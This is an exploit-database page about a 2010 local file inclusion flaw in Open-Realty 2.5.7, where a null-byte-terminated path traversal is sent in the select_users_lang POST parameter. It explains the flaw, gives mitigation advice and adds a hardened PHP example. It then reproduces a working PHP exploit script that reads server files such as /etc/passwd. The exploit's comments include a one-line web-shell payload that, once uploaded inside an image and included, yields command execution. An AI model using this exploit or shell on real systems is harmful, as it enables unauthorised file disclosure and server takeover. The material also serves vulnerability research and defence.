LFI in Open-Realty - exploit.company
Vendor: Open-Realty
Author: Nikola Petrov
CVSS: 7.5 (HIGH)
Vulnerability type: Local File Inclusion (LFI)
CWE: 22
Product Name: Open-Realty
Affected Version From: 2.5.2007
Affected Version To: 2.5.2007
Patch Exists: NO
Related CWE: Not specified
CPE: Not specified
Metasploit:
Other Scripts:
Platforms Tested: Not specified
Year: 2010

LFI in Open-Realty

The select_users_lang parameter of a POST request to /index.php is used, unsanitised, to build the path of a file that Open-Realty includes. The exploit terminates the supplied value with a URL-encoded null byte (%00): the web server decodes it to a NUL, and because PHP of that era passed the string to a C-level open() that stops at the first NUL, whatever the application appends after the parameter is silently dropped. The attacker therefore controls the whole path. A traversal such as ../../../../etc/passwd discloses local files; including a previously uploaded image that contains PHP code executes it on the server, which is the route to code execution described in the exploit comments. Two conditions must hold: magic_quotes_gpc must be off (otherwise the NUL is escaped to \0 and the trick fails), and the PHP runtime must still accept null bytes in file paths, which it did before PHP 5.3.4. Note that the exploit header lists the vulnerable version as 2.5.7 while the metadata above records 2.5.2007.

Mitigation:

No vendor patch is recorded for this entry. The correct fix is in the application: treat select_users_lang as a key into an allowlist of the language directories that are actually installed (or at least enforce a strict pattern such as a two-letter language code) and never concatenate it into an include path; reject any value containing a null byte. Running PHP 5.3.4 or later closes the null-byte truncation specifically, because the runtime refuses file paths that contain NUL, but the traversal itself remains until the input is validated. Do not rely on magic_quotes_gpc for protection: it was deprecated in PHP 5.3 and removed in PHP 5.4. Since the second half of the attack includes an uploaded image that carries PHP code, also keep the upload directory outside the web root or configure it so that nothing in it is executed or includable.
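To make the null-byte mechanism and the fix concrete, the following is an added example written for this page. It is not Open-Realty's code: the include pattern is a hypothetical reconstruction of the bug class the advisory describes, and the directory layout (LANG_DIR) and the lang.inc.php suffix are assumptions.

```php
<?php
// Added example for this page, not Open-Realty's own code. The include
// pattern below is a hypothetical reconstruction of the bug class described
// in the advisory; LANG_DIR and the lang.inc.php suffix are assumed.
declare(strict_types=1);

const LANG_DIR = '/var/www/open-realty/lang';   // assumed path

// Vulnerable pattern: the user-controlled language name is spliced into the
// path with a fixed suffix. At first glance the attacker only controls the
// middle of the path, which is why the exploit needs the null byte.
function vulnerableLangPath(string $selectUsersLang): string
{
    return LANG_DIR . '/' . $selectUsersLang . '/lang.inc.php';
}

// What PHP before 5.3.4 actually opened: the C-level open() stops at the
// first NUL, so the fixed suffix after %00 is discarded. PHP 5.3.4 and later
// refuse any file path that contains a NUL byte, so this truncation is gone.
function pathAsSeenByOldPhp(string $path): string
{
    $nul = strpos($path, "\0");
    return $nul === false ? $path : substr($path, 0, $nul);
}

// Hardened replacement: the parameter is a key into an allowlist of installed
// languages, never a path fragment. NUL bytes and anything that is not a short
// language tag are rejected before the lookup, so no user bytes reach include().
function safeLangPath(string $selectUsersLang, array $installedLangs): ?string
{
    if (strpos($selectUsersLang, "\0") !== false) {
        return null;
    }
    if (!preg_match('/^[a-z]{2}(?:_[A-Z]{2})?$/', $selectUsersLang)) {
        return null;
    }
    if (!in_array($selectUsersLang, $installedLangs, true)) {
        return null;
    }
    return LANG_DIR . '/' . $selectUsersLang . '/lang.inc.php';
}

// Constructed input: the advisory's select_users_lang value as the server
// sees it after URL-decoding the form body (%00 becomes a NUL byte).
$payload = str_repeat('../', 12) . 'etc/passwd' . "\0";

// The NUL is rendered as \0 so the full string is visible on a terminal.
printf("naive path   : %s\n", str_replace("\0", '\0', vulnerableLangPath($payload)));
printf("opened (old) : %s\n", pathAsSeenByOldPhp(vulnerableLangPath($payload)));

var_dump(safeLangPath($payload, ['en', 'de']));   // NULL: rejected
var_dump(safeLangPath('de', ['en', 'de']));       // the intended file only
```

Run it with the PHP CLI: the "opened (old)" line ends in /etc/passwd because the traversal climbs out of LANG_DIR and the suffix never reaches the open() call, while safeLangPath() returns NULL for the payload and a path only for a value that is literally in the allowlist. The allowlist, not the NUL check alone, is what removes the traversal; the NUL check only restores on old PHP what 5.3.4 does for you.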
Source

Exploit-DB raw data:

<?php
/*
 * Exploit Title: 
 * Date: 2010-08-18
 * Author: Nikola Petrov
 * Vendor: http://open-realty.org/
 * Version: 2.5.7
 */
	/*
		vulnerable: Open-Realty 2.5.7
		LFI: /index.php (POST parameter select_users_lang)
		
		upload image with: <?php system("echo \"<?php if(isset(\$_GET[\"cmd\"])) system(\$_GET[\"cmd\"]); ?>\" > sh.php"); ?>
		include the image and sh.php will be generated.
		proceed with sh.php

		MAGIC_QUOTES must be 'off' and %00 must not be replaced with \0.
	*/

	print "\n\n#########################################################################\n";
	print "#LFI discovery and implementation: Nikola Petrov (vp.nikola@gmail.com)\n";
	print "#Date: 05.09.2009\n";
	print "#########################################################################\n\n";

	if($argc < 5) {
		print "usage: $argv[0] host port path file [debug: 1/0]\n";
		print "example: $argv[0] localhost 80 / ../../../../../../../../../../../../etc/passwd\n\n\n";
		exit();
	}

	$Host  = $argv[1];
	$Port  = (int)$argv[2];
	$Path  = $argv[3];
	$File  = $argv[4];
	$Debug = isset($argv[5]) && $argv[5] == 1;   // optional argument, avoid an undefined-index notice

	function HttpSend($aHost, $aPort, $aPacket) {
		$Response = "";

		// 10 second connect timeout so a filtered port does not hang the script
		if(!$Socket = @fsockopen($aHost, $aPort, $errno, $errstr, 10)) {
			print "Error connecting to $aHost:$aPort ($errstr)\n\n";
			exit();
		}
		
		fputs($Socket, $aPacket);
		
		// read until the server closes the connection (see Connection: close below)
		while(!feof($Socket)) $Response .= fread($Socket, 1024);
		
		fclose($Socket);
		
		return $Response;
	}

	// Form body: the traversal path followed by %00. The server URL-decodes
	// %00 to a NUL byte, which truncates whatever the application appends
	// to select_users_lang before the include.
	$VulnRequest = "select_users_lang=" . $File . "%00";
	
	$Packet  = "POST {$Path} HTTP/1.1\r\n";
	$Packet .= "Host: {$Host}\r\n";
	$Packet .= "Connection: close\r\n";   // a keep-alive server never sends EOF, and the feof() loop would block
	$Packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
	$Packet .= "Content-Length: " . strlen($VulnRequest) . "\r\n\r\n";
	$Packet .= $VulnRequest;   // body must be exactly Content-Length bytes, no trailing newline

	if($Debug) print $Packet;

	print HttpSend($Host, $Port, $Packet);
?>